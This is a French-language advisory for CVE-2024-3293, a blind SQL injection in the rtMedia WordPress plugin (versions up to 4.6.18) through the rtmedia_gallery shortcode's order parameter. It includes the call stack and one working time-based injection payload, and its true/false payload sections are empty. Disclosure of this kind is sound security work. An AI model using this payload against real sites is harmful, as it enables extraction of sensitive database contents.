
CVE-2024-3293 rtMedia pour WordPress, BuddyPress et bbPress <= 4.6.18 - Authenticated (Contributor+) SQL Injection via rtmedia_gallery Shortcode
rtMedia pour WordPress, BuddyPress et bbPress <= 4.6.18 - Injection SQL authentifiée (Contributeur+) via le shortcode rtmedia_gallery
Description
Le plugin rtMedia pour WordPress, BuddyPress et bbPress est vulnérable à une injection SQL aveugle via le shortcode rtmedia_gallery dans toutes les versions jusqu'à la 4.6.18 inclus, en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'un manque de préparation suffisante sur la requête SQL existante. Cela permet à des attaquants authentifiés, ayant un accès de niveau contributeur ou supérieur, d'ajouter des requêtes SQL supplémentaires dans des requêtes déjà existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.
PILE D'APPEL
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Charge utile :
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Charge utile vraie :

Charge utile fausse :
